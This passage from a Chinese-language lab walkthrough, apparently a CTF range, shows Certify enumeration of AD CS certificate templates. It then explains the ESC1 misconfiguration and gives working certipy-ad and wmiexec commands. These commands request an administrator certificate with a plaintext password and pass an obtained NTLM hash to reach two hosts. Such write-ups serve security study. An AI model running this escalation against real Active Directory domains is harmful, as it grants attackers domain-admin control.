    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 文件恢复
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 服务器身份验证, 客户端身份验证
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Computers     S-1-5-21-990187620-235975882-534697781-515
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : DomainController
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 服务器身份验证, 客户端身份验证
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Controllers   S-1-5-21-990187620-235975882-534697781-516
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
                                      XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : WebServer
    Schema Version                        : 1
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 服务器身份验证
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : SubCA
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : DomainControllerAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 服务器身份验证, 客户端身份验证, 智能卡登录
    mspki-certificate-application-policy  : 服务器身份验证, 客户端身份验证, 智能卡登录
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Controllers   S-1-5-21-990187620-235975882-534697781-516
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
                                      XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : DirectoryEmailReplication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 目录服务电子邮件复制
    mspki-certificate-application-policy  : 目录服务电子邮件复制
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Controllers   S-1-5-21-990187620-235975882-534697781-516
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
                                      XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : KerberosAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
    mspki-certificate-application-policy  : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Controllers   S-1-5-21-990187620-235975882-534697781-516
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
                                      XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
      Object Control Permissions
        Owner                       : XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteOwner Principals       : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : LDAPS
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
    mspki-certificate-application-policy  : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Controllers   S-1-5-21-990187620-235975882-534697781-516
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
                                      XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : XR Manager
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : 安全电子邮件, 加密文件系统, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Users         S-1-5-21-990187620-235975882-534697781-513
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.6943600

查看设置了 msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT 标志的证书模版，利用这个漏洞冒充管理员。

ESC1利用前提条件：
msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT ：表示基于此证书模板申请新证书的用户可以为其他用户申请证书，即任何用户，包括域管理员用户
PkiExtendedKeyUsage: Client Authentication：表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证
Enrollment Rights: NT Authority\Authenticated Users ：表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书

ESC1

利用XR Manager模板为域管请求证书

proxychains4 certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager'  -upn administrator@xiaorang.lab

转换格式，请求 TGT，DCSync 或者 PTT

'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

pth横向移动

proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.26 -codec gbk